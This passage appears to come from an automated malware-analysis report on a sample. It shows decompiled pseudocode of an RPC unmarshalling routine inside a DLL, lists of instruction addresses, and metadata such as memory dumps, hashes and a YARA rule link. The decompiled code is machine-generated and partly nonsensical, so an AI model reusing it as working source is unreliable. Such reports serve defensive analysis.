									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 4:
									L13:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__edx + 4);
									_push(__eax);
									__ecx =  *__edx;
									_push(__ecx);
									0x6eda0000();
									__esp = __esp + 8;
									_push(__eax);
									_push("longlong=%s => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 5:
									L14:
									__eax =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 8);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__esp = __esp - 8;
									asm("movsd xmm0, [eax]");
									asm("movsd [esp], xmm0");
									_push("double=%f => %p\n");
									0x6eda0000();
									__esp = __esp + 0x10;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 8;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 6:
									L6:
									__edx = __ebp - 4;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 4, 2);
									__ecx =  *(__ebp - 4) & 0x0000ffff;
									__edx =  *(__ebp + 0xc);
									 *( *(__ebp + 0xc)) =  *(__ebp - 4) & 0x0000ffff;
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *( *(__ebp + 0xc));
									_push( *( *(__ebp + 0xc)));
									_push("enum16=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0xc);
									if( *( *(__ebp + 0xc)) > 0x7fff) {
										_push(0x6f5);
										__imp__RpcRaiseException();
									}
									L8:
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 7:
									L15:
									 *(__ebp - 0x1c) = 0;
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									_push("pointer => %p\n");
									0x6eda0000();
									__esp = __esp + 8;
									__eax =  *(__ebp + 0x10);
									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
										__edx =  *(__ebp + 0x10);
										 *(__ebp + 0x14) =  *(__ebp + 0x10);
									}
									__eax =  *(__ebp + 0x14);
									__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
									if(__ecx != 0x11) {
										 *(__ebp + 8) =  *(__ebp + 8) + 4;
										__eax = E6EDA73D0(__ecx,  *(__ebp + 8) + 4, 4);
									}
									__eax =  *(__ebp + 8);
									__ecx =  *(__eax + 4);
									 *(__ebp - 0x20) =  *(__eax + 4);
									__edx =  *(__ebp + 8);
									if( *( *(__ebp + 8) + 0x34) == 0) {
										__ecx =  *(__ebp + 0x14);
										__edx =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											 *(__ebp + 8) = E6EDAAF00( *(__ebp + 8), 4);
										}
									} else {
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 0x34);
										 *( *(__ebp + 8) + 4) =  *(__ecx + 0x34);
										__eax =  *(__ebp + 8);
										 *( *(__ebp + 8) + 0x34) = 0;
										 *(__ebp - 0x1c) = 1;
									}
									__ecx =  *(__ebp + 0x18) & 0x000000ff;
									__edx =  *(__ebp + 0x14);
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *(__ebp - 0x20);
									__ecx =  *(__ebp + 8);
									__eax = E6EDAB580( *(__ebp + 8),  *(__ebp - 0x20),  *(__ebp + 0xc),  *( *(__ebp + 0xc)),  *(__ebp + 0x14),  *(__ebp + 0x18) & 0x000000ff);
									if( *(__ebp - 0x1c) == 0) {
										L29:
										__edx =  *(__ebp + 0x10);
										__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
										if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
											 *(__ebp + 0x10) =  *(__ebp + 0x10) + 4;
										} else {
											__ecx =  *(__ebp + 0x14);
											__ecx =  *(__ebp + 0x14) + 4;
											 *(__ebp + 0x14) = __ecx;
										}
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
										while(1) {
											L47:
											 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
											goto L1;
										}
									} else {
										do {
											L24:
											__edx =  *(__ebp + 8);
											__eax =  *(__edx + 0x14);
											_push( *(__edx + 0x14));
											__ecx =  *(__ebp + 8);
											__edx =  *( *(__ebp + 8));
											__eax =  *(__ebp + 8);
											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
											_push( *(__eax + 4) -  *(__edx + 8));
											_push("buffer=%d/%d\n");
											0x6eda0000();
											__esp = __esp + 0xc;
											__edx =  *(__ebp + 8);
											__eax =  *( *(__ebp + 8));
											__ecx =  *(__eax + 8);
											__edx =  *(__ebp + 8);
											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
											__eax =  *(__ebp + 8);
											if( *( *(__ebp + 8) + 4) > __ecx) {
												__ecx =  *(__ebp + 8);
												__edx =  *( *(__ebp + 8));
												__eax =  *(__edx + 8);
												__ecx =  *(__ebp + 8);
												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
												__edx =  *(__ebp + 8);
												 *(__edx + 4) =  *(__edx + 4) - __eax;
												_push( *(__edx + 4) - __eax);
												_push("buffer overflow %d bytes\n");
												0x6eda0000();
												__esp = __esp + 8;
											}
											__edx = 0;
										} while (0 != 0);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp + 8);
										__edx =  *(__ecx + 4);
										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
										__eax =  *(__ebp + 8);
										__ecx =  *(__ebp - 0x20);
										 *( *(__ebp + 8) + 4) = __ecx;
										__edx =  *(__ebp + 0x14);
										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
											__ecx =  *(__ebp + 8);
											__eax = E6EDAAF00( *(__ebp + 8), 4);
										}
										goto L29;
									}
								case 8:
									L33:
									__ecx =  *(__ebp - 0x10);
									__edx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ebp + 0xc, __ecx, 2);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 9:
									L34:
									__eax =  *(__ebp - 0x10);
									__ecx = __ebp + 0xc;
									__eax = E6EDA7480(__ecx, __ecx,  *(__ebp - 0x10), 4);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xa:
									L35:
									__edx =  *(__ebp - 0x10);
									__ebp + 0xc = E6EDA7480(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 8);
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xb:
									goto L0;
								case 0xc:
									L36:
									1 = 1 << 0;
									__eax =  *(__ebp + 0x10);
									 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0xc) = ( *(__eax + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									__eax =  *(__ebp + 0x10);
									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
									__edx =  *(__ebp - 8);
									__eax =  *(__ebp + 8);
									 *(__ebp - 0x18) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp - 0x18);
									_push( *(__ebp - 0x18));
									_push("embedded complex (size=%d) => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__eax =  *(__ebp + 0x18) & 0x000000ff;
									if(( *(__ebp + 0x18) & 0x000000ff) != 0) {
										__ecx =  *(__ebp - 0x18);
										__edx =  *(__ebp + 0xc);
										__eax = E6EDB0770( *(__ebp + 0xc), 0,  *(__ebp - 0x18));
									}
									__eax =  *(__ebp - 8);
									__ecx =  *( *(__ebp - 8)) & 0x000000ff;
									__ecx =  *( *(__ebp - 8)) & 0x7f;
									__edx =  *(0x6edbb418 + __ecx * 4);
									 *(__ebp - 0x14) =  *(0x6edbb418 + __ecx * 4);
									if( *(__ebp - 0x14) == 0) {
										__edx =  *(__ebp - 8);
										__eax =  *( *(__ebp - 8)) & 0x000000ff;
										_push( *( *(__ebp - 8)) & 0x000000ff);
										_push("no unmarshaller for embedded type %02x\n");
										0x6eda0000();
										__esp = __esp + 8;
									} else {
										__eax =  *(__ebp - 8);
										__ecx =  *( *(__ebp - 8)) & 0x000000ff;
										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										} else {
											_push(0);
											__edx =  *(__ebp - 8);
											_push( *(__ebp - 8));
											__eax =  *(__ebp + 0xc);
											_push( *(__ebp + 0xc));
											__ecx =  *(__ebp + 8);
											_push( *(__ebp + 8));
											__eax =  *(__ebp - 0x14)();
										}
									}
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x18);
									 *(__ebp + 0xc) = __ecx;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
									goto L1;
								case 0xd:
									L45:
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xe:
									L10:
									__edx = __ebp - 0x24;
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8), __ebp - 0x24, 4);
									__ecx =  *(__ebp + 0xc);
									__edx =  *(__ebp - 0x24);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x24);
									__eax =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__ecx =  *(__ebp + 0xc);
									__edx =  *__ecx;
									_push( *__ecx);
									_push("int3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0xf:
									L11:
									__ecx = __ebp - 0x28;
									__edx =  *(__ebp + 8);
									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
									__ecx =  *(__ebp - 0x28);
									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
									__edx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__eax =  *(__ebp + 0xc);
									__ecx =  *( *(__ebp + 0xc));
									_push(__ecx);
									_push("uint3264=%ld => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
									while(1) {
										L47:
										 *(_t219 + 0x10) =  &(( *(_t219 + 0x10))[1]);
										goto L1;
									}
								case 0x10:
									goto L46;
							}
						}
						return  *(_t219 + 0xc);
					}
				}
			}






                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99b7
                                                                                                0x6eda99bc
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda956c
                                                                                                0x6eda9581
                                                                                                0x6eda958a
                                                                                                0x6eda9594
                                                                                                0x6eda9ab7
                                                                                                0x6eda9ac3
                                                                                                0x6eda9ac8
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda9acb
                                                                                                0x6eda959a
                                                                                                0x6eda959d
                                                                                                0x6eda95a4
                                                                                                0x00000000
                                                                                                0x6eda95ab
                                                                                                0x6eda95b5
                                                                                                0x6eda95c0
                                                                                                0x6eda95c7
                                                                                                0x6eda95c8
                                                                                                0x6eda95cd
                                                                                                0x6eda95d2
                                                                                                0x6eda95db
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95e3
                                                                                                0x6eda95e5
                                                                                                0x6eda95ed
                                                                                                0x6eda95f5
                                                                                                0x6eda95f8
                                                                                                0x6eda95f9
                                                                                                0x6eda95fc
                                                                                                0x6eda95ff
                                                                                                0x6eda9600
                                                                                                0x6eda9605
                                                                                                0x6eda960a
                                                                                                0x6eda960d
                                                                                                0x6eda9610
                                                                                                0x6eda9613
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9671
                                                                                                0x6eda9673
                                                                                                0x6eda967b
                                                                                                0x6eda9683
                                                                                                0x6eda9686
                                                                                                0x6eda9687
                                                                                                0x6eda968a
                                                                                                0x6eda968c
                                                                                                0x6eda968d
                                                                                                0x6eda9692
                                                                                                0x6eda9697
                                                                                                0x6eda969a
                                                                                                0x6eda969d
                                                                                                0x6eda96a0
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9726
                                                                                                0x6eda9728
                                                                                                0x6eda972c
                                                                                                0x6eda9730
                                                                                                0x6eda9738
                                                                                                0x6eda973b
                                                                                                0x6eda973c
                                                                                                0x6eda973f
                                                                                                0x6eda9743
                                                                                                0x6eda9746
                                                                                                0x6eda974b
                                                                                                0x6eda9750
                                                                                                0x6eda9755
                                                                                                0x6eda9758
                                                                                                0x6eda975b
                                                                                                0x6eda975e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9766
                                                                                                0x6eda9768
                                                                                                0x6eda9770
                                                                                                0x6eda9778
                                                                                                0x6eda977b
                                                                                                0x6eda977c
                                                                                                0x6eda977f
                                                                                                0x6eda9782
                                                                                                0x6eda9783
                                                                                                0x6eda9785
                                                                                                0x6eda9786
                                                                                                0x6eda978b
                                                                                                0x6eda978e
                                                                                                0x6eda978f
                                                                                                0x6eda9794
                                                                                                0x6eda9799
                                                                                                0x6eda979f
                                                                                                0x6eda97a2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97aa
                                                                                                0x6eda97ac
                                                                                                0x6eda97b0
                                                                                                0x6eda97b4
                                                                                                0x6eda97bc
                                                                                                0x6eda97bf
                                                                                                0x6eda97c0
                                                                                                0x6eda97c3
                                                                                                0x6eda97c6
                                                                                                0x6eda97ca
                                                                                                0x6eda97cf
                                                                                                0x6eda97d4
                                                                                                0x6eda97d9
                                                                                                0x6eda97dc
                                                                                                0x6eda97df
                                                                                                0x6eda97e2
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda961b
                                                                                                0x6eda961d
                                                                                                0x6eda9625
                                                                                                0x6eda962d
                                                                                                0x6eda9631
                                                                                                0x6eda9634
                                                                                                0x6eda9636
                                                                                                0x6eda9639
                                                                                                0x6eda963a
                                                                                                0x6eda963d
                                                                                                0x6eda963f
                                                                                                0x6eda9640
                                                                                                0x6eda9645
                                                                                                0x6eda964a
                                                                                                0x6eda964d
                                                                                                0x6eda9656
                                                                                                0x6eda9658
                                                                                                0x6eda965d
                                                                                                0x6eda965d
                                                                                                0x6eda9663
                                                                                                0x6eda9663
                                                                                                0x6eda9666
                                                                                                0x6eda9669
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda97ea
                                                                                                0x6eda97ea
                                                                                                0x6eda97f1
                                                                                                0x6eda97f4
                                                                                                0x6eda97f5
                                                                                                0x6eda97fa
                                                                                                0x6eda97ff
                                                                                                0x6eda9802
                                                                                                0x6eda9805
                                                                                                0x6eda980b
                                                                                                0x6eda980d
                                                                                                0x6eda9810
                                                                                                0x6eda9810
                                                                                                0x6eda9813
                                                                                                0x6eda9816
                                                                                                0x6eda981c
                                                                                                0x6eda9823
                                                                                                0x6eda9827
                                                                                                0x6eda982c
                                                                                                0x6eda982f
                                                                                                0x6eda9832
                                                                                                0x6eda9835
                                                                                                0x6eda9838
                                                                                                0x6eda983f
                                                                                                0x6eda9860
                                                                                                0x6eda9863
                                                                                                0x6eda9869
                                                                                                0x6eda9871
                                                                                                0x6eda9876
                                                                                                0x6eda9841
                                                                                                0x6eda9841
                                                                                                0x6eda9844
                                                                                                0x6eda9847
                                                                                                0x6eda984a
                                                                                                0x6eda984d
                                                                                                0x6eda9850
                                                                                                0x6eda9857
                                                                                                0x6eda9857
                                                                                                0x6eda9879
                                                                                                0x6eda987e
                                                                                                0x6eda9882
                                                                                                0x6eda9885
                                                                                                0x6eda9888
                                                                                                0x6eda988c
                                                                                                0x6eda9890
                                                                                                0x6eda9894
                                                                                                0x6eda98a0
                                                                                                0x6eda9935
                                                                                                0x6eda9935
                                                                                                0x6eda9938
                                                                                                0x6eda993e
                                                                                                0x6eda994e
                                                                                                0x6eda9951
                                                                                                0x6eda9940
                                                                                                0x6eda9940
                                                                                                0x6eda9943
                                                                                                0x6eda9946
                                                                                                0x6eda9946
                                                                                                0x6eda9957
                                                                                                0x6eda995a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a6
                                                                                                0x6eda98a9
                                                                                                0x6eda98ac
                                                                                                0x6eda98ad
                                                                                                0x6eda98b0
                                                                                                0x6eda98b2
                                                                                                0x6eda98b8
                                                                                                0x6eda98bb
                                                                                                0x6eda98bc
                                                                                                0x6eda98c1
                                                                                                0x6eda98c6
                                                                                                0x6eda98c9
                                                                                                0x6eda98cc
                                                                                                0x6eda98ce
                                                                                                0x6eda98d1
                                                                                                0x6eda98d4
                                                                                                0x6eda98d7
                                                                                                0x6eda98dd
                                                                                                0x6eda98df
                                                                                                0x6eda98e2
                                                                                                0x6eda98e4
                                                                                                0x6eda98e7
                                                                                                0x6eda98ea
                                                                                                0x6eda98ed
                                                                                                0x6eda98f3
                                                                                                0x6eda98f5
                                                                                                0x6eda98f6
                                                                                                0x6eda98fb
                                                                                                0x6eda9900
                                                                                                0x6eda9900
                                                                                                0x6eda9903
                                                                                                0x6eda9903
                                                                                                0x6eda9907
                                                                                                0x6eda990a
                                                                                                0x6eda990d
                                                                                                0x6eda9910
                                                                                                0x6eda9913
                                                                                                0x6eda9916
                                                                                                0x6eda9919
                                                                                                0x6eda991c
                                                                                                0x6eda991f
                                                                                                0x6eda9925
                                                                                                0x6eda9929
                                                                                                0x6eda992d
                                                                                                0x6eda9932
                                                                                                0x00000000
                                                                                                0x6eda9925
                                                                                                0x00000000
                                                                                                0x6eda9962
                                                                                                0x6eda9964
                                                                                                0x6eda9968
                                                                                                0x6eda996c
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9ab5
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memset
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 154592334-1168472477
                                                                                                • Opcode ID: 5c99a460764511e66358a924811aaed0d31af31d924fa871dc40ee82b7e2289c
                                                                                                • Instruction ID: cbe06618b368be295ac07c66253cfd13f8e8bce5651b42e4237be6d0a2d05fff
                                                                                                • Opcode Fuzzy Hash: 5c99a460764511e66358a924811aaed0d31af31d924fa871dc40ee82b7e2289c
                                                                                                • Instruction Fuzzy Hash: FEC12AB5A00109AFCB04CF99D890EAA7BB5AF89314F04C519FA594F345E731EA51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA9990, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 306COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 24%
                                                                                                			E6EDA9990(void* __ecx, void* __eflags) {
				void* _t214;
				void* _t216;
				void* _t217;

				L0:
				while(1) {
					L0:
					E6EDA7480(__ecx, _t214 + 0xc,  *((intOrPtr*)(_t214 - 0x10)), 8);
					_t217 = _t216 + 0xc;
					while(1) {
						L47:
						 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
						L1:
						while(( *( *(_t214 + 0x10)) & 0x000000ff) != 0x5b) {
							 *(_t214 - 0xc) =  *( *(_t214 + 0x10)) & 0x000000ff;
							 *(_t214 - 0xc) =  *(_t214 - 0xc) - 1;
							if( *(_t214 - 0xc) > 0xb8) {
								L46:
								0x6eda0000("unhandled format %d\n",  *( *(_t214 + 0x10)) & 0x000000ff);
								_t217 = _t217 + 8;
								while(1) {
									L47:
									 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
									goto L1;
								}
							}
							L3:
							_t10 =  *(_t214 - 0xc) + 0x6eda9b24; // 0xcccccc0f
							switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M6EDA9AE0))) {
								case 0:
									L4:
									E6EDAAFA0( *((intOrPtr*)(_t214 + 8)),  *(_t214 + 0xc), 1);
									_push( *(_t214 + 0xc));
									_push( *( *(_t214 + 0xc)) & 0x0000ffff);
									_push("byte=%d => %p\n");
									0x6eda0000();
									_t217 = _t217 + 0x18;
									 *(_t214 + 0xc) =  &(( *(_t214 + 0xc))[0]);
									L47:
									 *(_t214 + 0x10) =  &(( *(_t214 + 0x10))[1]);
									goto L1;
								case 1:
									L5:
									__edx =  *(__ebp + 0xc);
									 *(__ebp + 8) = E6EDAAFA0( *(__ebp + 8),  *(__ebp + 0xc), 2);
									__ecx =  *(__ebp + 0xc);
									_push( *(__ebp + 0xc));
									__edx =  *(__ebp + 0xc);
									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
									_push("short=%d => %p\n");
									0x6eda0000();
									__esp = __esp + 0xc;
									__ecx =  *(__ebp + 0xc);
									__ecx =  *(__ebp + 0xc) + 2;
									 *(__ebp + 0xc) = __ecx;
									while(1) {
										L47:
